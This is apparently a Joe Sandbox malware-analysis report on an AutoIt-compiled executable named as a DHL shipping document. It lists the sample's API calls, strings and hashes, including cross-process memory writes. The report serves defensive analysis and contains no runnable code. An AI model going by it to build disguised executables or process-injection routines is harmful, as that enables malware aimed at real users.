GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00211045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0021104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00211062

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: fc4b0f89a2362747434dfd93171517e4da80f0e1e16bffba1dd19ce11c8ed527
Instruction ID: 11a56e02865507b9db3e652d26dc9402b515fed783d271c10546e564c8373468
Opcode Fuzzy Hash: fc4b0f89a2362747434dfd93171517e4da80f0e1e16bffba1dd19ce11c8ed527
Instruction Fuzzy Hash: 47F06239602311EBD7215FA9EC4DF963FADEF8A761F200414FE49C7250CA70D890CA60

Function 0022030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,0022017D,?,002232FC,?,00000001,001F2592,?), ref: 00220324
CloseHandle.KERNEL32(?,?,?,?,0022017D,?,002232FC,?,00000001,001F2592,?), ref: 00220331
CloseHandle.KERNEL32(?,?,?,?,0022017D,?,002232FC,?,00000001,001F2592,?), ref: 0022033E
CloseHandle.KERNEL32(?,?,?,?,0022017D,?,002232FC,?,00000001,001F2592,?), ref: 0022034B
CloseHandle.KERNEL32(?,?,?,?,0022017D,?,002232FC,?,00000001,001F2592,?), ref: 00220358
CloseHandle.KERNEL32(?,?,?,?,0022017D,?,002232FC,?,00000001,001F2592,?), ref: 00220365

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 3ebdaefee82bd5b5337d053a793c81467dc09c1fe741ed022cf3a64b8bfe999d
Instruction ID: 2f96db6bd507077138163f383ecd8a33bae45bdfd25766a8a0d2e390f9821aa8
Opcode Fuzzy Hash: 3ebdaefee82bd5b5337d053a793c81467dc09c1fe741ed022cf3a64b8bfe999d
Instruction Fuzzy Hash: 3001A272811B26AFC730AFA6E8C0416FBF5BF503153158A7FD19652932C3B1A964CF80

Function 001ED73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 001ED752

Part of subcall function 001E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001ED7D1,00000000,00000000,00000000,00000000,?,001ED7F8,00000000,00000007,00000000,?,001EDBF5,00000000), ref: 001E29DE
Part of subcall function 001E29C8: GetLastError.KERNEL32(00000000,?,001ED7D1,00000000,00000000,00000000,00000000,?,001ED7F8,00000000,00000007,00000000,?,001EDBF5,00000000,00000000), ref: 001E29F0

_free.LIBCMT ref: 001ED764
_free.LIBCMT ref: 001ED776
_free.LIBCMT ref: 001ED788
_free.LIBCMT ref: 001ED79A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f296488ac5aaad2757863b686af0049cd335249675e55509fe5f341e9c823072
Instruction ID: cc7878053bd095be1262853dcdecf9e983e44a5cd96d0877d45de549a46b7283
Opcode Fuzzy Hash: f296488ac5aaad2757863b686af0049cd335249675e55509fe5f341e9c823072
Instruction Fuzzy Hash: 94F09632900A98AB8625EB76F9C7C1E77DDBB04318BA51C09F04CE7502C734FCC08661

Function 00215C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00215C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00215C6F
MessageBeep.USER32(00000000), ref: 00215C87
KillTimer.USER32(?,0000040A), ref: 00215CA3
EndDialog.USER32(?,00000001), ref: 00215CBD

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: be1dfd4c5123aaf125f3ea24dae3ba7fe65b2880456802c1f7b1203fb8a7829b
Instruction ID: afad14b6eb0b356ac206a1ab19b6905a75fa97f178230950ca6756eec598fdb7
Opcode Fuzzy Hash: be1dfd4c5123aaf125f3ea24dae3ba7fe65b2880456802c1f7b1203fb8a7829b
Instruction Fuzzy Hash: A401D634511B14EBEB215F14ED4EFE677FCBB51B01F0001AAB683A10E0DBF4A9948A90

Function 001E22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001E22BE

Part of subcall function 001E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001ED7D1,00000000,00000000,00000000,00000000,?,001ED7F8,00000000,00000007,00000000,?,001EDBF5,00000000), ref: 001E29DE
Part of subcall function 001E29C8: GetLastError.KERNEL32(00000000,?,001ED7D1,00000000,00000000,00000000,00000000,?,001ED7F8,00000000,00000007,00000000,?,001EDBF5,00000000,00000000), ref: 001E29F0

_free.LIBCMT ref: 001E22D0
_free.LIBCMT ref: 001E22E3
_free.LIBCMT ref: 001E22F4
_free.LIBCMT ref: 001E2305

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e3b13d72bda0825a5d8ed87bf08640dba8c54c163ad0e0d546c4fee59286ecfb
Instruction ID: d6ca8b38e9bb9037032bab62aacad6769b57dcdf5d79695158cdd3a3c6d84a87
Opcode Fuzzy Hash: e3b13d72bda0825a5d8ed87bf08640dba8c54c163ad0e0d546c4fee59286ecfb
Instruction Fuzzy Hash: 85F054B94029748B8627AF65BC5A80C3B6CF738760711550AF518D72B6CB3404629FE5

Function 001C95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 001C95D4
StrokeAndFillPath.GDI32(?,?,002071F7,00000000,?,?,?), ref: 001C95F0
SelectObject.GDI32(?,00000000), ref: 001C9603
DeleteObject.GDI32 ref: 001C9616
StrokePath.GDI32(?), ref: 001C9631

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 87420341f67da84129aa82e6486b78f8eafffe2ed75022c8b9ebc63be7d8cfb2
Instruction ID: 041165ffe2e7b377dc57035ace0d26b2e48464c2cc4b38a1bdb8cc41f46c35ed
Opcode Fuzzy Hash: 87420341f67da84129aa82e6486b78f8eafffe2ed75022c8b9ebc63be7d8cfb2
Instruction Fuzzy Hash: B3F04938007688EBDB265F69FD1CB683F69BB12322F148218F429550F2C73089A6DF20

Function 001E0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 001E10F9
__freea.LIBCMT ref: 001E1117

Part of subcall function 001E1537: _free.LIBCMT ref: 001E154F

Strings

a/p, xrefs: 001E11DE
am/pm, xrefs: 001E117A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 9e284516305cc23f24336508740e507838964853d476cf193ca3c16be52e48e6
Instruction ID: 8d21ac3afbd2f09bd5225618bf5d820a66e592acec64acb4ae79dc46eb170715
Opcode Fuzzy Hash: 9e284516305cc23f24336508740e507838964853d476cf193ca3c16be52e48e6
Instruction Fuzzy Hash: CBD13871900AC6FBCB289F6AC845BFEB7B1FF05710F290159EA01AB654D3759D80CB91

Function 002361D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 001D0242: EnterCriticalSection.KERNEL32(0028070C,00281884,?,?,001C198B,00282518,?,?,?,001B12F9,00000000), ref: 001D024D
Part of subcall function 001D0242: LeaveCriticalSection.KERNEL32(0028070C,?,001C198B,00282518,?,?,?,001B12F9,00000000), ref: 001D028A

Part of subcall function 001D00A3: __onexit.LIBCMT ref: 001D00A9

__Init_thread_footer.LIBCMT ref: 00236238

Part of subcall function 001D01F8: EnterCriticalSection.KERNEL32(0028070C,?,?,001C8747,00282514), ref: 001D0202
Part of subcall function 001D01F8: LeaveCriticalSection.KERNEL32(0028070C,?,001C8747,00282514), ref: 001D0235

Part of subcall function 0022359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 002235E4
Part of subcall function 0022359C: LoadStringW.USER32(00282390,?,00000FFF,?), ref: 0022360A

Strings

x#(, xrefs: 0023636F
x#(, xrefs: 0023633A
x#(, xrefs: 00236353

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#($x#($x#(
API String ID: 1072379062-2662966677
Opcode ID: d509e5a49f0c575af3cc081e480dee8d5f21ffe129f79a1d01c827cb6c8b7dec
Instruction ID: 6c08e0d3cd7b6e3fe9ac4cd88b05a236058826808b6a3d82e0501cb2e89d4191
Opcode Fuzzy Hash: d509e5a49f0c575af3cc081e480dee8d5f21ffe129f79a1d01c827cb6c8b7dec
Instruction Fuzzy Hash: 82C191B1A10106AFDB24DF98C894EBEB7B9FF58300F548069FA059B291DB70ED55CB90

Function 00212716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0021B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002121D0,?,?,00000034,00000800,?,00000034), ref: 0021B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00212760

Part of subcall function 0021B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,002121FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0021B3F8

Part of subcall function 0021B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0021B355
Part of subcall function 0021B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00212194,00000034,?,?,00001004,00000000,00000000), ref: 0021B365
Part of subcall function 0021B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00212194,00000034,?,?,00001004,00000000,00000000), ref: 0021B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 002127CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0021281A

Strings

@, xrefs: 00212832

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 33f9cba79aebdbde4b94a382b7801635b3ec3c6f01055f0b346ae20599f98b58
Instruction ID: af1217ee90a4dd57993368d32725668dd1cdeeb8b3c268d513a9c986851cf8f1
Opcode Fuzzy Hash: 33f9cba79aebdbde4b94a382b7801635b3ec3c6f01055f0b346ae20599f98b58
Instruction Fuzzy Hash: 84413D76900218AFDB15DFA4CD85ADEBBB8AF15300F108095FA55B7181DB706E99CB60

Function 001E172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe,00000104), ref: 001E1769
_free.LIBCMT ref: 001E1834
_free.LIBCMT ref: 001E183E

Strings

C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe, xrefs: 001E1760, 001E1767, 001E1796, 001E17CE

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\DHL DOCS 2-0106-25.exe
API String ID: 2506810119-2438341923
Opcode ID: dd84217eaad9d7fc48cf5a7faaec4934cbf1b1c41380f5ffc8f6e47dc4a5ac6e
Instruction ID: 7eb12facd3046c36f18d5ddccad06fa7de1bc4753dd7361cdbc0aafd7b0139f4
Opcode Fuzzy Hash: dd84217eaad9d7fc48cf5a7faaec4934cbf1b1c41380f5ffc8f6e47dc4a5ac6e
Instruction Fuzzy Hash: 5F31AD75E00698BBDB21DB9A9C85D9EBBFCEB95710B1041AAF80497251D7708E41CBA0

Function 0021C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0021C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0021C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00281990,00EF5D10), ref: 0021C395

Strings

0, xrefs: 0021C2DF

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 1652616519c9ff5d1c5ec30573652923b92a92d2cc11d7e7ac86bc127668c133
Instruction ID: 4d8dac09e9623c5bb6c77b56f80924b90099c10c4c95f70afe47d543afd7a170
Opcode Fuzzy Hash: 1652616519c9ff5d1c5ec30573652923b92a92d2cc11d7e7ac86bc127668c133
Instruction Fuzzy Hash: 004105352543029FD720DF24D884B9ABBE4BFA5310F20866EF861D72D1C730E895CB52

Function 00244416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0024CC08,00000000,?,?,?,?), ref: 002444AA
GetWindowLongW.USER32 ref: 002444C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 002444D7

Strings

SysTreeView32, xrefs: 0024447C

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 10d9c015c29dc3371ddcab64933b50905587bfc879849507bd4d30422a0c20bd
Instruction ID: b1fa946a6eb5f23ae3d98e16698dc0d78ae5145074afbc4eb2bc07d7924f2ae2
Opcode Fuzzy Hash: 10d9c015c29dc3371ddcab64933b50905587bfc879849507bd4d30422a0c20bd
Instruction Fuzzy Hash: 0531A231220606AFDF24AF38DC45BDA77A9EB19334F204715F979921D0D770EC609B50

Function 00244537 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0024461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00244634

Strings

8], xrefs: 002445D7
', xrefs: 0024458E

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageSend
String ID: '$8]
API String ID: 3850602802-3612234159
Opcode ID: 5451d905ba3132d1662e9fbb7066f8a60c09fb0b85f819a30466e9cc2c7635a7
Instruction ID: d63ca288c62792d1908fe92c2a2630f388b14afdaf31f59d3d6ba1ad5e8e32c0
Opcode Fuzzy Hash: 5451d905ba3132d1662e9fbb7066f8a60c09fb0b85f819a30466e9cc2c7635a7
Instruction Fuzzy Hash: 40316A74A0130A9FDF18DFA9C980BDABBB9FF19300F50406AE905AB381D770A911CF90

Function 00216E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00216EED
VariantCopyInd.OLEAUT32(?,?), ref: 00216F08
VariantClear.OLEAUT32(?), ref: 00216F12

Strings

*j!, xrefs: 00216E8B, 00216E90, 00216EF8

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *j!
API String ID: 2173805711-434145623
Opcode ID: 5c12f04603ea371718fa5905fb8815d17ef2d9d82faad891a9360ebf6a968be1
Instruction ID: 6d0cbc5a248b00fcb39342350f6d7927b8397e8f74fe06f4a63f6d0de03ef931
Opcode Fuzzy Hash: 5c12f04603ea371718fa5905fb8815d17ef2d9d82faad891a9360ebf6a968be1
Instruction Fuzzy Hash: F331B371618205DFCB15AFA4E8999FD37B9FFA5300B2004A8F9034B6B1C7B09D62DB90

Function 0023304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0023335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00233077,?,?), ref: 00233378

inet_addr.WSOCK32(?), ref: 0023307A
_wcslen.LIBCMT ref: 0023309B
htons.WSOCK32(00000000), ref: 00233106

Strings

255.255.255.255, xrefs: 00233095, 0023309A

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 37c7f2205b1f4df1116ad9e8c899703d55d83d9d49faff0d23082bf1e2c1168f
Instruction ID: c58452be27aa32a140eab2000abf6839e7990d6f318c52d1508b0bd62476b558
Opcode Fuzzy Hash: 37c7f2205b1f4df1116ad9e8c899703d55d83d9d49faff0d23082bf1e2c1168f
Instruction Fuzzy Hash: 5431D5B96142069FCB24CF28C585EA977F0EF14318F248059E9158F392DB72DF55CB60

Function 002195AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0021961D

Strings

#requireadmin, xrefs: 002195D9
#notrayicon, xrefs: 002195B7
#OnAutoItStartRegister, xrefs: 002195F3

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: 6fefe30948d72c028ff56179604e95816d7631a6ad1619f2fb78c6434526d5eb
Instruction ID: 9082aecd07a259718bcc1af5d9b1666712a241b98efbdf2daae4eeeb7b4d3235
Opcode Fuzzy Hash: 6fefe30948d72c028ff56179604e95816d7631a6ad1619f2fb78c6434526d5eb
Instruction Fuzzy Hash: D3215E3212415166D331AF249C22FF773DDEFB5300F504026FA4997181EB91ADE2C2E5

Function 002437B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00243840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00243850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00243876

Strings

Listbox, xrefs: 0024380F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

